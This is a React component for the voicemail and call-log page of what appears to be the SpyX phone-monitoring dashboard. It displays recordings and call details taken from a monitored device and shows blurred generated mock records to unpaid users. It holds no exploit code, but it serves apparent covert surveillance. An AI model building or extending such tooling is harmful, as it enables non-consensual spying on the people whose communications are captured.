// ** React Imports
import { useState, useEffect, useRef, useCallback } from 'react'
import { useExtremeUpgradeRefresh } from 'src/hooks/useExtremeUpgradeRefresh'


import { useTranslation } from 'src/utils/i18n'
import { styled } from '@mui/material/styles'

// ** Icon Imports
import Icon from 'src/@core/components/icon'

// request
import { getAllDashboard } from '/src/@api/dashboard'
import dayjs from 'dayjs'
import duration from 'dayjs/plugin/duration'

dayjs.extend(duration)

import { useDispatch, useSelector } from 'react-redux'

import { setCurrentTab, changeExtremeService } from 'src/store/apps/Common'
import { generateMockData } from 'src/utils'
import ExtremeUpgradeModal from 'src/@core/components/modal/extreme-upgrade'
import { useExtremeFeatureAccessGate } from 'src/hooks/useExtremeFeatureAccessGate'
import { getUserAccountOrder } from 'src/@api/login'

const ScrollDiv = styled('div')({
  '@media (max-width: 600px)': {
    '-msOverflowStyle': 'none',  /* 适用于 IE 和 Edge */
    scrollbarWidth: 'none',  /* 适用于 Firefox */
    '&::-webkit-scrollbar': {
      display: 'none', /* 适用于 WebKit 浏览器（如 Chrome、Safari 和新版 Edge） */
    }
  }
})

const Voicemail = () => {
  const store = useSelector(state => state.Common)

  const { t, locale } = useTranslation('common')

  let Advanced = window.localStorage.getItem('Advanced')
  Advanced = Advanced == null || Advanced == 0 ? true : false

  // ** State
  const dispatch = useDispatch()

  const [calls, setCalls] = useState([])

  const [active, setActive] = useState('VOICEMAIL')

  const [activeIndex, setActiveIndex] = useState(0)

  const [maxNum, setMaxNum] = useState(false)
  const [isLoading, setIsLoading] = useState(true) //正在加载获取数据

  const [advanced, setAdvanced] = useState(true) // 是否购买高级服务
  const [fetchLoading, setFetchLoading] = useState(true) // 数据获取中
  const basicNotOver = [null, ''].includes(store.resetTime.basicUpdateDownloadTime) // 是否未完成一步验证
  const advancedNotOver = [null, ''].includes(store.resetTime.advancedUpdateDownloadTime) // 高级数据未下载完成（空 = 未完成）
  // 高级功能门控（对齐 SpyX）：未绑高级 → 跳 /ios/extreme-verification；数据未就绪 → 暂停渲染
  const { gatePending, showUpgradeModal } = useExtremeFeatureAccessGate(advanced)
  const [justVerified, setJustVerified] = useState(false) // 是否为刚完成验证

  const setCallData = async (page, pageSize) => {
    const username = JSON.parse(localStorage.getItem('DeviceUser')) != null
      ? JSON.parse(localStorage.getItem('DeviceUser')).username
      : ''

    // 获取最近的10笔订单
    let res = await getUserAccountOrder({ page: 1, pageSize: 10 })

    // 查找有限期最长的订单
    const lastOrder = res.data.sort((a, b) => dayjs(b.expire_time).valueOf() - dayjs(a.expire_time).valueOf())[0]

    // 计算是否为增值服务上线前付费用户

    // 增值服务上线前付费用户状态更新


    let response = await getAllDashboard({
      username,
      params: {
        category: active,
        offset: (page - 1) * pageSize,
        limit: pageSize,
        deviceUdid:
          JSON.parse(localStorage.getItem('currentDevice')) != null
            ? JSON.parse(localStorage.getItem('currentDevice'))['Unique Identifier']
            : ''
      }
    })
    setIsLoading(false)
    const advanced = username == null || !('advanced' in response) || ['true', true].includes(response?.advanced) // 高级服务开通状态
    setAdvanced(advanced)
    dispatch(changeExtremeService(advanced)) // 更新高级服务状态

    if (response.data.contents == null) {
      setMaxNum(true)
      setFetchLoading(false)

      return
    }

    let result = response.data.contents.map(item => {
      return {
        ...item,
        time:
          active == 'VOICEMAIL'
            ? dayjs(Number(`${item.date}000`)).format('YYYY-MM-DD HH:mm')
            : dayjs(Number(`${item.date}`)).format('YYYY-MM-DD HH:mm'),
        url: `https://cos.spyx.com/${item.url}.mp3`,
        type: active,
        playing: false,
        sender: active == 'VOICEMAIL' ? item.sender : item.displayName
      }
    })

    if (!advanced) { // 未开通高级服务
      const mockData = generateMockData(result) // 生成模拟数据
      setCalls([...mockData])
    } else setCalls(old => ([...old, ...result]))

    setFetchLoading(false)
  }

  const [currentPage, setCurrentPage] = useState(1)

  useEffect(() => {
    setCallData(currentPage, 50)
  }, [currentPage, active])

  // 升级成功后：预缓冲已在 notify 完成，这里重拉详情读 advanced
  useExtremeUpgradeRefresh(
    useCallback(() => {
      setAdvanced(true)
      setCalls([])
      setCurrentPage(1)
      setMaxNum(false)
      setFetchLoading(true)
      setCallData(1, 50)
    }, [])
  )

  const domRef = useRef(null)

  // 滚动百分比
  const [scroll, setScroll] = useState(0)

  // 监听进度条滚动
  useEffect(() => {
    const handleScroll = () => {
      if (domRef.current) {
        const { scrollTop, scrollHeight, clientHeight } = domRef.current
        const progress = (scrollTop / (scrollHeight - clientHeight)) * 100
        setScroll(progress.toFixed(0))
      }
    }

    const currentRef = domRef.current
    if (currentRef) {
      currentRef.addEventListener('scroll', handleScroll)
    }

    return () => {
      if (currentRef) {
        currentRef.removeEventListener('scroll', handleScroll)
      }
    }
  }, [])

  useEffect(() => {
    if (scroll >= 100 && advanced && !maxNum) {
      setCurrentPage(old => old + 1)
    }
  }, [scroll])

  const audioRefs = useRef([])

  const handlePlay = index => {
    audioRefs.current.forEach((audio, idx) => {
      if (audio && idx !== index) {
        audio.pause()
      }
    })
  }

  useEffect(() => {
    const title = t('Voicemail')
    dispatch(setCurrentTab(title))

    return () => dispatch(setCurrentTab(''))
  }, [dispatch, locale])

  useEffect(() => {
    const handleBeforeUnload = () => {
      audioRefs.current.forEach(audio => {
        if (audio) {
          audio.pause()
        }
      })
    }

    window.addEventListener('beforeunload', handleBeforeUnload)

    return () => {
      window.removeEventListener('beforeunload', handleBeforeUnload)
    }
  }, [])

  return (
    <>
      <div className='relative'>
        {
          !fetchLoading && !gatePending &&
          <>
            {
              (!basicNotOver && !advancedNotOver && !justVerified) ?
                <>
                  {/* 高级服务开通提示 */}
                  {showUpgradeModal && <ExtremeUpgradeModal open />}
                </>
                :
                <>
                  {/* 增值服务 iCloud验证流程 */}
                </>
            }

          </>
        }
        <ScrollDiv
          ref={domRef}
          className={`bg-[#FFF] [box-shadow:0px_0px_12px_0px_#00000021] rounded-[10px] Bxl:h-[calc(var(--vh2)*100-94px)] Bxls:Headers5:h-[calc(var(--vh2)*100-149px)] Header5:big:h-[calc(var(--vh2)*100-214px)] bigs:h-[calc(var(--vh2)*100-274px)] px-[15px] pb-[20px] flex flex-col ${advanced ? 'overflow-auto' : 'overflow-hidden'}`}
        >
          <table className={`border-separate border-spacing-x-[15px] border-spacing-y-[10px] w-full smj:hidden ${!advanced ? 'blur-[16px] select-none' : ''}`}>
            <tr className='sticky top-0 bg-[#FFF] z-50'>
              <th className='text-nowrap pt-[10px] text-start text-[14px] text-[#000] font-[600]'>{t('NAME')}</th>
              <th className='text-nowrap pt-[10px] text-start text-[14px] text-[#000] font-[600]'>
                {active === 'VOICEMAIL' ? t('PLAY') : t('ADDRESS')}
              </th>
              <th className='text-nowrap pt-[10px] text-start text-[14px] text-[#000] font-[600]'>{t('DIRECTION')}</th>
              <th className='text-nowrap pt-[10px] text-start text-[14px] text-[#000] font-[600]'>{t('DURATION')}</th>
              <th className='text-nowrap pt-[10px] text-start text-[14px] text-[#000] font-[600]'>{t('DATE')}</th>
            </tr>
            {calls.map((row, index) => (
              <tr key={index}>
                <td className='text-[14px] text-[#000] text-nowrap'> {`${row.sender}`}</td>
                <td className='text-[14px] text-[#000] text-nowrap flex-center w-[35%]'>
                  {active == 'VOICEMAIL' ? (
                    <div>
                      <audio controls ref={el => (audioRefs.current[index] = el)} onPlay={() => handlePlay(index)}>
                        <source src={row.url} type='audio/mpeg' />
                      </audio>
                    </div>
                  ) : (
                    <div style={{ display: 'flex', alignItems: 'center' }}>
                      <span style={{ width: '132px' }}>{row.address}</span>
                    </div>
                  )}
                </td>
                <td className='text-[14px] text-[#000] text-nowrap'>
                  <Icon
                    fontSize='18'
                    color='#586275'
                    icon={row.originated == 0 ? 'ph:phone-incoming-bold' : 'ph:phone-outgoing-light'}
                  ></Icon>
                </td>
                <td className='text-[14px] text-[#000] text-nowrap'>{row.duration}</td>
                <td className='text-[14px] text-[#000] text-nowrap'>{row.time}</td>
              </tr>
            ))}
          </table>

          {/* 移动端排版 */}
          <div className={`smjs:hidden h-auto ${!advanced ? 'blur-[16px] select-none' : ''}`}>
            {calls.map((row, index) => (
              <div key={row.id} className='flex w-full' onClick={() => setActiveIndex(index)}>
                <div className={`border-[#e6e6e6] border-b-[0.5px] w-full flex flex-col justify-center font-[Poppins] py-[10px] ${index === 0 && 'pt-[12px] pb-[9px]'}`}>
                  <div className='flex justify-between items-center'>
                    <div>
                      <p className='text-[17px] font-[500] leading-[23.8px] text-[#000000]'>{row.sender}</p>
                      <p className='text-[14px] font-[400] text-[#8A8A8E] leading-[21px] mr-[15px]'>{dayjs(row.time).format('YYYY/MM/DD HH:mm')}</p>
                    </div>
                    <p className='text-[14px] font-[400] leading-[21px] text-[#8A8A8E]'>{dayjs.duration(row.duration, 'seconds').format('mm:ss')}</p>
                  </div>

                  <div className={`w-full h-[71px] flex justify-center overflow-hidden transition-[max-height] duration-100 ease-linear max-h-0 ${activeIndex === index ? 'max-h-[71px]' : ''}`}>
                    <audio controls ref={el => (audioRefs.current[index] = el)} onPlay={() => handlePlay(index)} className='mt-4 mb-[6px]'>
                      <source src={row.url} type='audio/mpeg' />
                    </audio>
                  </div>
                </div>
              </div>
            ))}
          </div>
          {advanced && calls.length == 0 && !isLoading &&
            <div className='text-center px-5 absolute inset-0 flex justify-center items-center pointer-events-none'>
              {t('It appears theres no data to show here yet')}<br />
              {t('If data exists it may take up to 1 hour to download and appear')}<br />
              {t('We suggest checking back in a little while')}
            </div>}
        </ScrollDiv>
      </div>
    </>
  )
}



export default Voicemail
